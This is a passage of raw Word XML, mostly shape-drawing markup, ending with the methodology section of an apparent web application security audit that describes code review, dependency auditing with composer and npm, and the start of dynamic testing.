                            <a:ext cx="876300" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="876300" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="869404" y="0"/>
                                  <a:pt x="871650" y="929"/>
                                  <a:pt x="873509" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="875369" y="4649"/>
                                  <a:pt x="876299" y="6894"/>
                                  <a:pt x="876300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="876300" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="876299" y="135981"/>
                                  <a:pt x="875369" y="138226"/>
                                  <a:pt x="873509" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="871650" y="141945"/>
                                  <a:pt x="869404" y="142875"/>
                                  <a:pt x="866775" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138226"/>
                                  <a:pt x="0" y="135981"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>
                                  <a:pt x="2790" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="929"/>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767" style="width:69pt;height:11.25pt;position:absolute;z-index:-2147483577;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:413.18pt;mso-position-vertical-relative:text;margin-top:12.0536pt;" coordsize="8763,1428">
                <v:shape id="Shape 300" style="position:absolute;width:8763;height:1428;left:0;top:0;" coordsize="876300,142875" path="m9525,0l866775,0c869404,0,871650,929,873509,2789c875369,4649,876299,6894,876300,9525l876300,133350c876299,135981,875369,138226,873509,140084c871650,141945,869404,142875,866775,142875l9525,142875c6894,142875,4650,141945,2790,140084c930,138226,0,135981,0,133350l0,9525c0,6894,930,4649,2790,2789c4650,929,6894,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6672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39A8F5DA" wp14:editId="21EC8A62">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1494532</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>324531</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2724150" cy="1181100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="25768" name="Group 25768"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2724150" cy="1181100"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2724150" cy="1181100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="303" name="Shape 303"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="800100" y="0"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="929"/>
                                  <a:pt x="863985" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4648"/>
                                  <a:pt x="866774" y="6894"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866774" y="135979"/>
                                  <a:pt x="865845" y="138224"/>
                                  <a:pt x="863985" y="140083"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141943"/>
                                  <a:pt x="859880" y="142873"/>
                                  <a:pt x="857250" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142873"/>
                                  <a:pt x="4650" y="141943"/>
                                  <a:pt x="2790" y="140083"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>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06" name="Shape 306"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2095500" y="0"/>
                            <a:ext cx="628650" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="628650" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="619125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="621755" y="0"/>
                                  <a:pt x="624000" y="929"/>
                                  <a:pt x="625860" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="627720" y="4648"/>
                                  <a:pt x="628650" y="6894"/>
                                  <a:pt x="628650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="628650" y="135979"/>
                                  <a:pt x="627720" y="138224"/>
                                  <a:pt x="625860" y="140083"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="624000" y="141943"/>
                                  <a:pt x="621755" y="142873"/>
                                  <a:pt x="619125" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142873"/>
                                  <a:pt x="4650" y="141943"/>
                                  <a:pt x="2790" y="140083"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>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12" name="Shape 312"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="333375" y="438150"/>
                            <a:ext cx="866775" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="866775" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="857250" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="859880" y="0"/>
                                  <a:pt x="862125" y="929"/>
                                  <a:pt x="863985" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="865845" y="4648"/>
                                  <a:pt x="866775" y="6894"/>
                                  <a:pt x="866775" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="866775" y="135981"/>
                                  <a:pt x="865845" y="138226"/>
                                  <a:pt x="863985" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="862125" y="141945"/>
                                  <a:pt x="859880" y="142875"/>
                                  <a:pt x="857250" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138226"/>
                                  <a:pt x="0" y="135981"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>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15" name="Shape 315"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1466849" y="438150"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576376" y="929"/>
                                  <a:pt x="578236" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4648"/>
                                  <a:pt x="581025" y="6894"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135981"/>
                                  <a:pt x="580095" y="138226"/>
                                  <a:pt x="578236" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576376" y="141945"/>
                                  <a:pt x="574130" y="142875"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138226"/>
                                  <a:pt x="0" y="135981"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>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21" name="Shape 321"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="695325" y="876300"/>
                            <a:ext cx="1457325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1457325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1447800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1450431" y="0"/>
                                  <a:pt x="1452675" y="929"/>
                                  <a:pt x="1454535" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1456395" y="4649"/>
                                  <a:pt x="1457325" y="6894"/>
                                  <a:pt x="1457325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1457325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1457325" y="126456"/>
                                  <a:pt x="1456395" y="128701"/>
                                  <a:pt x="1454535" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1452675" y="132420"/>
                                  <a:pt x="1450431" y="133350"/>
                                  <a:pt x="1447800" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128701"/>
                                  <a:pt x="0" y="126456"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4649"/>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25" name="Shape 325"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1047750"/>
                            <a:ext cx="638175" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="638175" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="628650" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="631280" y="0"/>
                                  <a:pt x="633525" y="929"/>
                                  <a:pt x="635385" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="637245" y="4648"/>
                                  <a:pt x="638175" y="6894"/>
                                  <a:pt x="638175" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="638175" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="638175" y="126454"/>
                                  <a:pt x="637245" y="128699"/>
                                  <a:pt x="635385" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="633525" y="132418"/>
                                  <a:pt x="631280" y="133348"/>
                                  <a:pt x="628650" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133348"/>
                                  <a:pt x="4650" y="132418"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>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28" name="Shape 328"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="809625" y="1047750"/>
                            <a:ext cx="342900" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="929"/>
                                  <a:pt x="340110" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4648"/>
                                  <a:pt x="342900" y="6894"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="126454"/>
                                  <a:pt x="341970" y="128699"/>
                                  <a:pt x="340110" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="132418"/>
                                  <a:pt x="336005" y="133348"/>
                                  <a:pt x="333375" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133348"/>
                                  <a:pt x="4650" y="132418"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6894"/>
                                  <a:pt x="930" y="4648"/>
                                  <a:pt x="2790" y="2789"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="4650" y="929"/>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768" style="width:214.5pt;height:93pt;position:absolute;z-index:-2147483562;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:117.68pt;mso-position-vertical-relative:text;margin-top:25.5536pt;" coordsize="27241,11811">
                <v:shape id="Shape 303" style="position:absolute;width:8667;height:1428;left:8001;top:0;" coordsize="866775,142875" path="m9525,0l857250,0c859880,0,862125,929,863985,2789c865845,4648,866774,6894,866775,9525l866775,133350c866774,135979,865845,138224,863985,140083c862125,141943,859880,142873,857250,142875l9525,142875c6895,142873,4650,141943,2790,140083c930,138224,0,135979,0,133350l0,9525c0,6894,930,4648,2790,2789c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 306" style="position:absolute;width:6286;height:1428;left:20955;top:0;" coordsize="628650,142875" path="m9525,0l619125,0c621755,0,624000,929,625860,2789c627720,4648,628650,6894,628650,9525l628650,133350c628650,135979,627720,138224,625860,140083c624000,141943,621755,142873,619125,142875l9525,142875c6895,142873,4650,141943,2790,140083c930,138224,0,135979,0,133350l0,9525c0,6894,930,4648,2790,2789c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 312" style="position:absolute;width:8667;height:1428;left:3333;top:4381;" coordsize="866775,142875" path="m9525,0l857250,0c859880,0,862125,929,863985,2789c865845,4648,866775,6894,866775,9525l866775,133350c866775,135981,865845,138226,863985,140084c862125,141945,859880,142875,857250,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138226,0,135981,0,133350l0,9525c0,6894,930,4648,2790,2789c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 315" style="position:absolute;width:5810;height:1428;left:14668;top:4381;" coordsize="581025,142875" path="m9525,0l571500,0c574130,0,576376,929,578236,2789c580095,4648,581025,6894,581025,9525l581025,133350c581025,135981,580095,138226,578236,140084c576376,141945,574130,142875,571500,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138226,0,135981,0,133350l0,9525c0,6894,930,4648,2790,2789c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 321" style="position:absolute;width:14573;height:1333;left:6953;top:8763;" coordsize="1457325,133350" path="m9525,0l1447800,0c1450431,0,1452675,929,1454535,2789c1456395,4649,1457325,6894,1457325,9525l1457325,123825c1457325,126456,1456395,128701,1454535,130559c1452675,132420,1450431,133350,1447800,133350l9525,133350c6895,133350,4650,132420,2790,130559c930,128701,0,126456,0,123825l0,9525c0,6894,930,4649,2790,2789c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 325" style="position:absolute;width:6381;height:1333;left:0;top:10477;" coordsize="638175,133350" path="m9525,0l628650,0c631280,0,633525,929,635385,2789c637245,4648,638175,6894,638175,9525l638175,123825c638175,126454,637245,128699,635385,130559c633525,132418,631280,133348,628650,133350l9525,133350c6895,133348,4650,132418,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6894,930,4648,2790,2789c4650,929,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
                <v:shape id="Shape 328" style="position:absolute;width:3429;height:1333;left:8096;top:10477;" coordsize="342900,133350" path="m9525,0l333375,0c336005,0,338250,929,340110,2789c341970,4648,342900,6894,342900,9525l342900,123825c342900,126454,341970,128699,340110,130559c338250,132418,336005,133348,333375,133350l9525,133350c6895,133348,4650,132418,2790,130559c930,128699,0,126454,0,123825l0,9525c0,6894,930,4648,2790,2789c4650,929,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Manual code review (white box).</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The primary technique and the one that found the most severe issues. V-01 and V-02 are invisible to a scanner that does not know which routes </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ought</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to be </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>privileged a</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanner sees </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /register </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">returning 201 and calls it working. Reading </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>routes/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> next to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kernel.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and noticing that a registered middleware alias appears nowhere is a human activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB21FB3" w14:textId="5725638F"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Software composition analysis.</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composer audit</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E868FD" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Immediate and decisive: 41 and 23 advisories respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1277133C" w14:textId="7113579F"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Dynamic testing (black box).</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> We wrote </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>evidence/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
